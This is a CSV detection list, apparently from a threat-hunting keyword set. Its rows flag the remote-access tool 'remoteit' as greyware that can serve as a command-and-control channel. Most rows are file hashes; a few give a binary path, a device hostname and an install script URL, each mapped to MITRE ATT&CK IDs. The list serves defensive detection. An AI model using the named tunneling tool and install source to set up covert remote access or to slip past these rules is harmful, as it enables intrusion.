"*bf8b63373a944d43c2c3c9b4c768cbff723526d25f40e5548e47318c7ec1b674*",".{0,1000}bf8b63373a944d43c2c3c9b4c768cbff723526d25f40e5548e47318c7ec1b674.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*c13136af014ba278cfd9f3a3ba1d9fd4e1996c72d32c068c3b259a8c5930e1d8*",".{0,1000}c13136af014ba278cfd9f3a3ba1d9fd4e1996c72d32c068c3b259a8c5930e1d8.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*c1b657c2bb9c1713b0a4a6b5eea12df8b16dc1e82d1655215573575bf5a710d3*",".{0,1000}c1b657c2bb9c1713b0a4a6b5eea12df8b16dc1e82d1655215573575bf5a710d3.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*c1b73bfeb5933efe372525bb800f452e335247cec34ef4ca214069cf83928e45*",".{0,1000}c1b73bfeb5933efe372525bb800f452e335247cec34ef4ca214069cf83928e45.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*c269975b163143664260be837652e7163d150453b35f1d97abeadb31c9e47d66*",".{0,1000}c269975b163143664260be837652e7163d150453b35f1d97abeadb31c9e47d66.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - 
TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*c3bdcbd3ee63b0ff732b9027161d0e75550783a2285f36ae0b3940886f3fc1d7*",".{0,1000}c3bdcbd3ee63b0ff732b9027161d0e75550783a2285f36ae0b3940886f3fc1d7.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*c477182f8337d9b0ceb73fa2de3f0384a7781caa47bf33845ea7552746e6df65*",".{0,1000}c477182f8337d9b0ceb73fa2de3f0384a7781caa47bf33845ea7552746e6df65.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*c4b51b5bdd584b2901180946bd0325d1673110a9f6f2050f522404a280bc2d3b*",".{0,1000}c4b51b5bdd584b2901180946bd0325d1673110a9f6f2050f522404a280bc2d3b.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*c4c77cda828b390796df90293a7595b030a9966af3804451295766b2d6d57a31*",".{0,1000}c4c77cda828b390796df90293a7595b030a9966af3804451295766b2d6d57a31.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" 
"*c5baab0546d6a6f34ef0b571c8d16df52e8ea3093515986ae3eee3755683546a*",".{0,1000}c5baab0546d6a6f34ef0b571c8d16df52e8ea3093515986ae3eee3755683546a.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*c5d0c469b322039c20ffdbbc052083c342a0c1b9b2b16b47be469e0da76fb3f1*",".{0,1000}c5d0c469b322039c20ffdbbc052083c342a0c1b9b2b16b47be469e0da76fb3f1.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*c8a0f709cf4759d81ced139804cd7f790590fea22b34e00a7abe57431fb8525c*",".{0,1000}c8a0f709cf4759d81ced139804cd7f790590fea22b34e00a7abe57431fb8525c.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*c9192193554c131a5f3c8dcdc1764bae1705583f853f302d48185128fdf7594c*",".{0,1000}c9192193554c131a5f3c8dcdc1764bae1705583f853f302d48185128fdf7594c.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*c9cc2b7d5ff7a0f9f7b97da9bf4a090bfd323be51bda6c12eb2b01c9efa816b5*",".{0,1000}c9cc2b7d5ff7a0f9f7b97da9bf4a090bfd323be51bda6c12eb2b01c9efa816b5.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - 
TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*c9f5f2d7fae73dc38b27872ccb37559f5a7dd96b15b48c6e54bd6a5640d852e2*",".{0,1000}c9f5f2d7fae73dc38b27872ccb37559f5a7dd96b15b48c6e54bd6a5640d852e2.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*ca8a4d90295fa5049d85ac5b867861ec4740f64f5f3061a1c0308d2a041dbf2b*",".{0,1000}ca8a4d90295fa5049d85ac5b867861ec4740f64f5f3061a1c0308d2a041dbf2b.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*ca9099738d41c98fa1f8fe983cbc9071e37af846c851311316ee8b38c2cb5706*",".{0,1000}ca9099738d41c98fa1f8fe983cbc9071e37af846c851311316ee8b38c2cb5706.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*cb923918ef4e035f3ac3c144792f3d20e5519741c4e1f56ff9bee53f6cd4592c*",".{0,1000}cb923918ef4e035f3ac3c144792f3d20e5519741c4e1f56ff9bee53f6cd4592c.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" 
"*cc5604a463e90dd1da595a73e2fd9e0282a465fe7cd41f46e34ed05a7b84b295*",".{0,1000}cc5604a463e90dd1da595a73e2fd9e0282a465fe7cd41f46e34ed05a7b84b295.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*cd386a8883d2da370ccf24b6b29313bd58510ab87bce674ede931eb1310b153f*",".{0,1000}cd386a8883d2da370ccf24b6b29313bd58510ab87bce674ede931eb1310b153f.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*ce9bd575dccf2e5b373d8f7b1aca7cfdbf6d9a4e9179a24ac6d92914b3f782d4*",".{0,1000}ce9bd575dccf2e5b373d8f7b1aca7cfdbf6d9a4e9179a24ac6d92914b3f782d4.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*connectd/usr/bin/connectd_d2d*",".{0,1000}connectd\/usr\/bin\/connectd_d2d.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","N/A","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*d0a44c5acf4946e913a8534d362d681bd50205d00549d3db028d8ce2802e9b86*",".{0,1000}d0a44c5acf4946e913a8534d362d681bd50205d00549d3db028d8ce2802e9b86.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" 
"*d11fdf3e02243a642c2158357522d457d4111058723c5ce79c355c40b4495350*",".{0,1000}d11fdf3e02243a642c2158357522d457d4111058723c5ce79c355c40b4495350.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*d1455ccf2efda304183873600535c73e8205663b384ec30a8c9f2e6ecd0a91b0*",".{0,1000}d1455ccf2efda304183873600535c73e8205663b384ec30a8c9f2e6ecd0a91b0.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","0","#filehash","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z" "*d1905784a1ef416d990ea8cbe68e0af88e2d33a4b2a8b5f9a75e056405a7dcb5*",".{0,1000}d1905784a1ef416d990ea8cbe68e0af88e2d33a4b2a8b5f9a75e056405a7dcb5.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*d34833e0daa78c9a9a36b3ff311596ec7d010afa18d95ca02fc6ee577630d81a*",".{0,1000}d34833e0daa78c9a9a36b3ff311596ec7d010afa18d95ca02fc6ee577630d81a.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*d3f7f5fce71cbd20a86771949c9fe143cf4732f69db1cd9beaafd6a6a9de795b*",".{0,1000}d3f7f5fce71cbd20a86771949c9fe143cf4732f69db1cd9beaafd6a6a9de795b.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - 
TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*d57bf75bc694c0f583e9e23acee5dc35a2ab719a842adb52008ed494d0cd5979*",".{0,1000}d57bf75bc694c0f583e9e23acee5dc35a2ab719a842adb52008ed494d0cd5979.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*d6e5f1a398a35682f888bbce3b6187389d845778327479fb80091cd7ffcf78c7*",".{0,1000}d6e5f1a398a35682f888bbce3b6187389d845778327479fb80091cd7ffcf78c7.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","0","#filehash","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z" "*d810084b9bb4b7c552be24f744165d6a46d777d39bf36f3a5951df7108b77437*",".{0,1000}d810084b9bb4b7c552be24f744165d6a46d777d39bf36f3a5951df7108b77437.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*d8289c3873b04fe89664452f40f859431572e3417ef3fc102d7eacf8f8b288cf*",".{0,1000}d8289c3873b04fe89664452f40f859431572e3417ef3fc102d7eacf8f8b288cf.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" 
"*d9d826b12867990006f7a5bc6f015d0effde87b65427c0a3f7b23370314ad16f*",".{0,1000}d9d826b12867990006f7a5bc6f015d0effde87b65427c0a3f7b23370314ad16f.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*daabc151e0d5a6436c71bceedf79759369a11edb7fc75a2dd9b2f32098ac2b65*",".{0,1000}daabc151e0d5a6436c71bceedf79759369a11edb7fc75a2dd9b2f32098ac2b65.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*dab18572b7ed5e6c70ae7e1973a6af974aed0ab30bed7d385a92ae7cc22851ac*",".{0,1000}dab18572b7ed5e6c70ae7e1973a6af974aed0ab30bed7d385a92ae7cc22851ac.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*db8f43c3b82fa1517800e8672750708886820c4eafe4d72f96773898ad996588*",".{0,1000}db8f43c3b82fa1517800e8672750708886820c4eafe4d72f96773898ad996588.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*db9fe305a4ca18b39e80a2b5bf0f6ea32bf41b968798897703647bbeb39e11f7*",".{0,1000}db9fe305a4ca18b39e80a2b5bf0f6ea32bf41b968798897703647bbeb39e11f7.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - 
TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*dbe984e84ff23af911cf29adb0c3f9fe665f873708b5937a44b156846029a43f*",".{0,1000}dbe984e84ff23af911cf29adb0c3f9fe665f873708b5937a44b156846029a43f.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*dbf767a606cbb7c653296843204fe570a8b59b622faa3315ecf555ecc6e0803f*",".{0,1000}dbf767a606cbb7c653296843204fe570a8b59b622faa3315ecf555ecc6e0803f.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*dc42d5e6752383656c1cc05459bd10dd9f6a25c3c715a38d1c14dc0391a00982*",".{0,1000}dc42d5e6752383656c1cc05459bd10dd9f6a25c3c715a38d1c14dc0391a00982.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*de4038e39b557638be260ddeb85bf3e6e806aef81ac07b681b0303414baf99bd*",".{0,1000}de4038e39b557638be260ddeb85bf3e6e806aef81ac07b681b0303414baf99bd.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" 
"*deda21817db09e3239b1cd5be4b8bfdeb8a603a285b72169927c246970b99b00*",".{0,1000}deda21817db09e3239b1cd5be4b8bfdeb8a603a285b72169927c246970b99b00.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*device.remote.it*",".{0,1000}device\.remote\.it.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","1","N/A","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*downloads.remote.it/remoteit/install_agent.sh*",".{0,1000}downloads\.remote\.it\/remoteit\/install_agent\.sh.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","1","N/A","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*e1ff5a314c147e1e6d7e7ae3d302cc0b1734a4e8aa20d35d2c3e786b1438e164*",".{0,1000}e1ff5a314c147e1e6d7e7ae3d302cc0b1734a4e8aa20d35d2c3e786b1438e164.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*e2a5be5bc8d923fb310f98b974e5dcfe0c308dedd9efe931923793ad7bdace9e*",".{0,1000}e2a5be5bc8d923fb310f98b974e5dcfe0c308dedd9efe931923793ad7bdace9e.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" 
"*e2cbbea92145e924cec43ae92bbb865aa3b31e5323af273724ab2a56cf01e972*",".{0,1000}e2cbbea92145e924cec43ae92bbb865aa3b31e5323af273724ab2a56cf01e972.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*e4b62f88bc61b3a1ef4cc83ba6aebefefec75ab246d83e8708c3cf1c8c3240b4*",".{0,1000}e4b62f88bc61b3a1ef4cc83ba6aebefefec75ab246d83e8708c3cf1c8c3240b4.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*e4c382716cdf1d4d582eb2ac3279f498c8e335d119737fa390a766296738ee87*",".{0,1000}e4c382716cdf1d4d582eb2ac3279f498c8e335d119737fa390a766296738ee87.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*e7b060f41a2322c481867f623ee711a321d6fb554fe816251f1381d1669a68c8*",".{0,1000}e7b060f41a2322c481867f623ee711a321d6fb554fe816251f1381d1669a68c8.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*e7f39694ec1f97181d17f0f9b8fbad820c5bc98289602f7a960916142596c4b3*",".{0,1000}e7f39694ec1f97181d17f0f9b8fbad820c5bc98289602f7a960916142596c4b3.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - 
TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*e9cbf615487a666b2fe9c5b7c749fa91d4af0454bd368f4f3275148609f553bf*",".{0,1000}e9cbf615487a666b2fe9c5b7c749fa91d4af0454bd368f4f3275148609f553bf.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*ea178a3f4a3bf35c1998533cac58f1bf5fb90ddca42540d29d8efc1e93480bb9*",".{0,1000}ea178a3f4a3bf35c1998533cac58f1bf5fb90ddca42540d29d8efc1e93480bb9.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*eb60b71cf30ee2975270b48a31c4e2d1812e61bbfb4f5c3bd512b578782e7b3f*",".{0,1000}eb60b71cf30ee2975270b48a31c4e2d1812e61bbfb4f5c3bd512b578782e7b3f.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*ebae9cb602d9475764d0abb184a85747dc86c0a2c683357f9bfafbadce743030*",".{0,1000}ebae9cb602d9475764d0abb184a85747dc86c0a2c683357f9bfafbadce743030.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" 
"*ec3af0d72abfdc79b417640ec6d170e079f6ebf4917f0a317aa441a64851d85c*",".{0,1000}ec3af0d72abfdc79b417640ec6d170e079f6ebf4917f0a317aa441a64851d85c.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*ee0917c3db2e6a92e681f9b3b7837165924df74e5ca5bb9c3f7de7f411c9512b*",".{0,1000}ee0917c3db2e6a92e681f9b3b7837165924df74e5ca5bb9c3f7de7f411c9512b.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*eee0125ce7d147791c5b6df258e849476727218f04d1ebbd1a305e64b8e9e777*",".{0,1000}eee0125ce7d147791c5b6df258e849476727218f04d1ebbd1a305e64b8e9e777.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*f062d1f8866ffa374149c6c672e92947654876e80faa847b5fba3eb098b22d46*",".{0,1000}f062d1f8866ffa374149c6c672e92947654876e80faa847b5fba3eb098b22d46.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*f1f11c0e9dc81dbb5d52bfd190ad7487c124c20c248ee224d8163ec9d703a096*",".{0,1000}f1f11c0e9dc81dbb5d52bfd190ad7487c124c20c248ee224d8163ec9d703a096.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - 
TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*f309dc9fddef92be50048234dab7ef0fbb0af6aae0567ae60459a8a35e8d36f6*",".{0,1000}f309dc9fddef92be50048234dab7ef0fbb0af6aae0567ae60459a8a35e8d36f6.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*f410d7494e1e07669dcd4bb02b08f5b79720f7b11522e7dac064d2336800fb00*",".{0,1000}f410d7494e1e07669dcd4bb02b08f5b79720f7b11522e7dac064d2336800fb00.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*f48343180d92f8780323d45addd6ddfae8d496fa31b1c9abebd8e543db544443*",".{0,1000}f48343180d92f8780323d45addd6ddfae8d496fa31b1c9abebd8e543db544443.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*f4c231ebe0140f82fe4b1528171c9fe0cb754ed803729681e2187adc68d9accb*",".{0,1000}f4c231ebe0140f82fe4b1528171c9fe0cb754ed803729681e2187adc68d9accb.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" 
